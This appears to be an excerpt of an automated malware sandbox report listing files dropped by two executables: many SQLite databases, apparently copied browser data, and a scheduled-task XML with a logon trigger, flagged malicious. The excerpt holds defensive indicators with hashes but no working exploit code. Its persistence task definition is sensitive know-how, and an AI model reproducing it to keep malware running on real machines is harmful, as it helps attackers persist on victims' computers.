                      C:\Users\user\AppData\Local\Temp\tmp504.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp5089.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp509A.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp50BA.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp50CB.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp50DB.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp515.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp516.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp51ED.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1573
                      Entropy (8bit):5.112988249221591
                      Encrypted:false
                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTuv
                      MD5:9755CB91C030592D84AA155F7BD02EEA
                      SHA1:6F775CF126484313B42161BDD7BB95620E29D975
                      SHA-256:6D26F6304937BAB14A555D12678AB6B777C8679120DC1E688D8C0AF98394E9E3
                      SHA-512:13A9CC60C3361C20EB8AEC8BDA207DB25CC13BD82FB705C43EAE1F81297CD6FC8186537D478EEC2483E833CC8B81A85F9BCED357335FB3E18ED0FF13A5807BA6
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                      C:\Users\user\AppData\Local\Temp\tmp526.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7376.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7386.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp73A6.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp73B7.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp73C8.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp76F9.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1573
                      Entropy (8bit):5.112988249221591
                      Encrypted:false
                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTuv
                      MD5:9755CB91C030592D84AA155F7BD02EEA
                      SHA1:6F775CF126484313B42161BDD7BB95620E29D975
                      SHA-256:6D26F6304937BAB14A555D12678AB6B777C8679120DC1E688D8C0AF98394E9E3
                      SHA-512:13A9CC60C3361C20EB8AEC8BDA207DB25CC13BD82FB705C43EAE1F81297CD6FC8186537D478EEC2483E833CC8B81A85F9BCED357335FB3E18ED0FF13A5807BA6
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                      C:\Users\user\AppData\Local\Temp\tmp872E.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp873F.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8750.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8760.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8781.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8791.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpAA2B.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpAA4B.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpAA4C.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
